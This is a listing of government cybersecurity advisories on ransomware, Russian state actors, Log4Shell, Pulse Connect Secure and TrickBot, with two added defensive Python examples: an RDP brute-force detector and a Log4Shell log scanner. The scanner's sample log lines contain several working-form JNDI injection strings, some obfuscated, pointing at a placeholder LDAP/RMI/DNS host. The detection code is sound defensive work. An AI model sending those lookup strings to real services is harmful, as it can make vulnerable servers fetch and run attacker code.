AA22-040A: 2021 Trends Show Increased Globalized Threat of Ransomware

date: February 9, 2022 | Last revised: February 10, 2022

Summary

Immediate Actions You Can Take Now to Protect Against Ransomware:
• Update your operating system and software.
• Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
• If you use Remote Desktop Protocol (RDP), secure and monitor it.
• Make an offline backup of your data.
• Use multifactor authentication (MFA).
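The RDP item above says to "secure and monitor" it. As an added example, not taken from the advisory, the following Python shows the monitoring half: a sliding-window count of failed RDP logons per source address over Windows Security events, alerting on a burst of failures and, separately, on a success that follows a burst (a guessed password). The event records are constructed and use this example's own simplified field names (real 4625/4624 events carry the same data as TargetUserName, IpAddress and LogonType); the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = 4625      # Windows Security log: "An account failed to log on"
SUCCESS_LOGON = 4624     # "An account was successfully logged on"
RDP_LOGON_TYPE = 10      # LogonType 10 = RemoteInteractive (RDP / Terminal Services)


def _event(ts, event_id, user, src):
    # Simplified record for this example; the field names are our own, not the
    # event schema (there they are TargetUserName, IpAddress, LogonType).
    return {"time": ts.isoformat(), "id": event_id, "logon_type": RDP_LOGON_TYPE,
            "user": user, "src": src}


def constructed_events():
    """Constructed sample events, not real telemetry."""
    base = datetime(2022, 2, 1, 3, 0, 0)
    ev = []
    # An internal user mistypes once and then logs on: must not alert.
    ev.append(_event(base, FAILED_LOGON, "jdoe", "10.0.0.4"))
    ev.append(_event(base + timedelta(seconds=20), SUCCESS_LOGON, "jdoe", "10.0.0.4"))
    # Twelve failures in two minutes against one account from one external
    # address, then a success: a brute force that worked.
    for i in range(12):
        ev.append(_event(base + timedelta(seconds=10 * i), FAILED_LOGON,
                         "administrator", "203.0.113.7"))
    ev.append(_event(base + timedelta(seconds=130), SUCCESS_LOGON,
                     "administrator", "203.0.113.7"))
    # Three failures spread over an hour: below any sensible threshold.
    for i in range(3):
        ev.append(_event(base + timedelta(minutes=20 * i), FAILED_LOGON,
                         "svc-backup", "198.51.100.9"))
    return ev


SAMPLE_EVENTS = constructed_events()


def detect_rdp_bruteforce(events, threshold=10, window_seconds=300,
                          success_min_failures=5,
                          logon_types=frozenset({RDP_LOGON_TYPE})):
    """Sliding-window count of RDP logon failures per source address.

    Alerts once per source when it accumulates `threshold` failures inside the
    window, and separately when a source that already has at least
    `success_min_failures` failures in the window then logs on successfully.
    Caveat: with Network Level Authentication enabled, failed RDP attempts are
    commonly logged with LogonType 3 rather than 10; pass logon_types={10, 3}
    if that is what your hosts record.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) failures in window
    alerted = set()
    alerts = []
    for e in sorted(events, key=lambda e: e["time"]):
        if e["logon_type"] not in logon_types or e["id"] not in (FAILED_LOGON, SUCCESS_LOGON):
            continue
        ts = datetime.fromisoformat(e["time"])
        q = recent[e["src"]]
        while q and ts - q[0][0] > window:
            q.popleft()               # discard failures that fell out of the window
        if e["id"] == FAILED_LOGON:
            q.append((ts, e["user"]))
            if len(q) >= threshold and e["src"] not in alerted:
                alerted.add(e["src"])
                alerts.append({"type": "brute_force", "src": e["src"],
                               "failures": len(q), "time": e["time"],
                               "users": sorted({u for _, u in q})})
        elif len(q) >= success_min_failures:
            alerts.append({"type": "success_after_failures", "src": e["src"],
                           "user": e["user"], "failures": len(q), "time": e["time"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

The second alert type matters more than the first: a burst of failures from one address is common Internet noise against exposed RDP, but a success from the same address inside the window is the event worth paging on. Exposing RDP only behind a VPN or gateway with MFA, as the list above recommends, removes most of the noise this detector would otherwise see.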


AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure

date: January 11, 2022 | Last revised: March 1, 2022

Summary

Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.
• Patch all systems. Prioritize patching known exploited vulnerabilities.
• Implement multi-factor authentication.
• Use antivirus software.
• Develop internal contact lists and surge support.


AA21-356A: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities

date: December 22, 2021 | Last revised: December 23, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance for vulnerabilities in Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks for systems vulnerable to Log4Shell, CVE-2021-45046, and CVE-2021-45105 in order to exploit them. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited.
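Because the scanning the summary describes arrives as Log4j lookup strings in HTTP headers and URLs, and attackers routinely obfuscate them, a search for the literal text `${jndi:` misses most attempts. As an added example (not part of the advisory and not Apache's code), the following Python normalises the common obfuscations before matching: repeated URL encoding, the `${lower:x}`/`${upper:x}` lookups, and the `${...:-x}` default-value form (`${::-j}`, `${env:NOPE:-j}`), all of which Log4j resolves to the plain character. The access-log lines, addresses and payloads are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines for illustration; addresses, paths and payloads
# are made up and are not taken from the advisory.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] '
    '"GET /?x=${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [10/Dec/2021:12:00:15 +0000] "GET /api HTTP/1.1" 200 10 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:20 +0000] '
    '"GET /%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 404 0 "-" "x"',
]

# ${lower:X} and ${upper:X} evaluate to X; case is irrelevant because the
# normalised text is lowercased at the end.
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-X} (for example ${::-j} or ${env:NOPE:-j}) evaluates to the default X.
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What survives normalisation: a JNDI lookup and the protocol it points at.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(text, max_rounds=8):
    """Undo URL encoding and the lookup tricks above until the text stops changing.

    Iterating handles nesting (${${lower:j}...}) and double encoding (%2524 -> %24 -> $);
    max_rounds bounds the work on adversarial input.
    """
    for _ in range(max_rounds):
        new = unquote(text)
        new = LOOKUP_CASE.sub(r"\1", new)
        new = LOOKUP_DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text.lower()


def find_jndi_scheme(line):
    """Return the JNDI protocol (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    match = JNDI_LOOKUP.search(normalize(line))
    return match.group(1) if match else None


def scan(lines):
    """Scan access-log lines; report line number, client address, scheme and the decoded payload."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi_scheme(line)
        if scheme:
            hits.append({"line": number, "src": line.split(" ", 1)[0],
                         "scheme": scheme, "normalized": normalize(line)})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(hit["line"], hit["src"], hit["scheme"], hit["normalized"])
```

A hit in web-server logs only shows that a lookup string reached the server; whether it was evaluated depends on which applications behind it log the offending field with a vulnerable Log4j, so treat these as leads for the asset inventory and patching work the advisory describes, and expect the scanning source addresses to be throwaway infrastructure.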


AA21-148A: Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs

date: May 28, 2021

Summary

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the…



AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.


AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities

date: April 20, 2021 | Last revised: May 28, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor, or actors, beginning in June 2020 or earlier, related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Connect Secure Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence across appliance patching.



AA21-076A: TrickBot Malware

date: March 17, 2021 | Last revised: May 20, 2021

Summary

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the…


